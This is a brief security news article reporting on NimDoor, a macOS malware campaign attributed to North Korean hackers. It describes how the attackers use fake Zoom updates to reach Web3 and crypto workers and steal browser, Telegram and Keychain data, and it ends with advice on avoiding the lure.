A new threat campaign run by North Korean hackers is targeting macOS devices with malware called NimDoor. The campaign targets Web3 and crypto-related businesses and was first discovered active in April 2025.
Hackers use social engineering tactics and Telegram to reach out to potential targets, likely in the Web3 and crypto fields, and invite them to a meeting via Calendly. The target is then sent an email with a Zoom meeting link and instructions to run a fake Zoom update that starts the infection process. If run successfully, the malware can steal Telegram user data, browser data, and Apple Keychain credentials.
This update script, dubbed a Zoom SDK update, ends with three lines of malicious code that download and execute a second-stage script from a command-and-control (C2) server hosted at a domain name very similar to the legitimate Zoom meeting domain. SentinalLabs’ investigation into the malware revealed several parallel domains in use by the hackers as well.
The new script then downloads an HTML file with a legitimate Zoom redirect link. The file gets passed to curl and executed via run script to finally start the attack. Hackers then install multiple binaries on the target system that each have their own function, specifically, stealing browser data, keychain data, Telegram user data, and maintaining persistence. Most popular macOS browsers are affected by the malware, including Arc, Brave, Firefox, Chrome, and Edge.
No active fixes for the problem have surfaced yet. However, people in the Web3 and crypto spaces are advised to practice caution and avoid any unsolicited invitations from contacts over social media or messaging apps like WhatsApp and especially Telegram. Another important thing to remember is that any sort of software update should only be downloaded from official sources.
In the News: Chinese hacker linked to Silk Typhoon arrested in Italy
